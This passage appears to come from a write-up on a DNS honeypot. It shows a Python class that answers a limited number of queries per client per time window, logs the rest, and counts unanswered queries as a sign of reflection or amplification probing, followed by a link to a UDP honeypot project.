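    resolver; after that they are only logged, until req_timeout seconds
    have passed since the client's window started, when answering resumes.
    """

    def __init__(self, req_count=3, req_timeout=30.0, clock=time.monotonic):
        self.req_count = req_count
        self.req_timeout = req_timeout
        self.clock = clock
        self.state = {}   # client_ip -> (answered_in_window, window_start)
        self.log = []     # (time, client_ip, qname, qtype, resolved)

    def handle(self, client_ip, qname, qtype="A"):
        """Log the query and return True if it should be resolved and answered."""
        now = self.clock()
        answered, start = self.state.get(client_ip, (0, now))
        if now - start >= self.req_timeout:
            answered, start = 0, now          # quota window expired: reset
        resolve = answered < self.req_count
        if resolve:
            answered += 1
        self.state[client_ip] = (answered, start)
        self.log.append((now, client_ip, qname, qtype, resolve))
        return resolve

    def refused_counts(self):
        """Queries per client sent after its quota ran out. A client that keeps
        querying without getting answers is not looking for resolution, which
        is the signature of reflection/amplification probing."""
        counts = {}
        for _, ip, _, _, resolved in self.log:
            if not resolved:
                counts[ip] = counts.get(ip, 0) + 1
        return counts
```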

Relevant Link:

https://github.com/jekil/UDPot

 

Copyright (c) 2016 LittleHann All rights reserved
